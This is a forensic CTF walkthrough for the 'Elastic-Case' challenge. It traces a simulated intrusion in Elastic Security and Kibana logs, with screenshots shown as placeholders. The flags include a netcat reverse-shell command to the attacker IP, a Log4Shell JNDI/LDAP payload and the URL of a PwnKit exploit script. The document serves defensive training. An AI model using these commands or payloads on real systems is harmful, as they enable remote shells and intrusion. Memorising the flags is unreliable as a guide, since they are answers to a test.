Elastic-Case

Walkthrough

In this challenge will focus on two main sections of Elastic, Elastic Security as we are using 
Elastic as SIEM and Kibana for analytics.

logo

💡 Don’t forget to change the time range to see all the logs.

1. Who downloads the malicious file which has a double extension?

🛡️ Elastic Security

image

image

image

image

🖥️ Kibana

image

Flag: ahmed

2. What is the hostname he was using?

🛡️ Elastic Security

image

🖥️ Kibana

image

Flag: DESKTOP-Q1SL9P2

3. What is the name of the malicious file?

🛡️ Elastic Security

image

🖥️ Kibana

image

Flag: Acount_details.pdf.exe

4. What is the attacker’s IP address?

🛡️ Elastic Security

💡 You can copy any object by moving the mouse over the object then click right icon to copy to the clipboard.

image

image

🖥️ Kibana

image

Flag: 192.168.1.10

5. Another user with high privilege runs the same malicious file. What is the username?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: cybery

6. The attacker was able to upload a DLL file of size 8704. What is the file name?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: mCblHDgWP.dll

7. What parent process name spawns cmd with NT AUTHORITY privilege and pid 10716?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: rundll32.exe

8. The previous process was able to access a registry. What is the full path of the registry?

🛡️ Elastic Security

image

🖥️ Kibana

image

Flag: HKLM\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled

9. PowerShell process with pid 8836 changed a file in the system. What was that filename?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: ModuleAnalysisCache

10. PowerShell process with pid 11676 created files with the ps1 extension. What is the first file that has been created?

🛡️ Elastic Security

image

image

image

🖥️ Kibana

image

Flag: __PSScriptPolicyTest_bymwxuft.3b5.ps1

11. What is the machine’s IP address that is in the same LAN as a windows machine?

🛡️ Elastic Security

image

image

image

🖥️ Kibana

image

Flag: 192.168.10.30

12. The attacker login to the Ubuntu machine after a brute force attack. What is the username he was successfully login with?

🛡️ Elastic Security

image

image

🖥️ Kibana

flag: salem

13. After that attacker downloaded the exploit from the GitHub repo using wget. What is the full URL of the repo?

🛡️ Elastic Security

image

image

image

🖥️ Kibana

image

Flag: https://raw.githubusercontent.com/joeammond/CVE-2021-4034/main/CVE-2021-4034.py

14. In the Ubuntu machine, The attacker ran a python exploit, which created three new files simultaneously. What was the time when it was created?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: @ Feb 2, 2022 @ 23:15:06.557

15. After The attacker runs the exploit, which spawns a new process called pkexec, what is the process’s md5 hash?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: 3a4ad518e9e404a6bad3d39dfebaf2f6

16. Then attacker gets an interactive shell by running a specific command on the process id 3011 with the root user. What is the command?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: bash -i

17. What is the hostname which alert signal.rule.name: “Netcat Network Activity”?

🛡️ Elastic Security

image

image

image

Flag: CentOS

18. What is the username who ran netcat?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: solr

19. What is the parent process name of netcat?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: java

20. If you focus on nc process, you can get the entire command that the attacker ran to get a reverse shell. Write the full command?

🛡️ Elastic Security

image

image

🖥️ Kibana

image

Flag: nc -e /bin/bash 192.168.1.10 9999

21. From the previous three questions, you may remember a famous java vulnerability. What is it?

Log4Shell.

Flag: Log4Shell

22. What is the entire log file path of the “solr” application?

🖥️ Kibana

image

Flag: /var/solr/logs/solr.log

23. What is the path that is vulnerable to log4j?

🖥️ Kibana

image

image

Flag: /admin/cores

24. What is the GET request parameter used to deliver log4j payload?

🖥️ Kibana

image

Flag: foo

25. What is the JNDI payload that is connected to the LDAP port?

🖥️ Kibana

image

flag: {foo=${jndi:ldap://192.168.1.10:1389/Exploit}}

———————- I really hope you found this challenge and walkthrough useful.———————-